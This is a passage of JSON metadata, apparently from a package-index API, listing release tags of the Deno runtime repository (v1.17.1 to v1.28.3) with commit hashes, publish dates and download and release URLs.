2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifes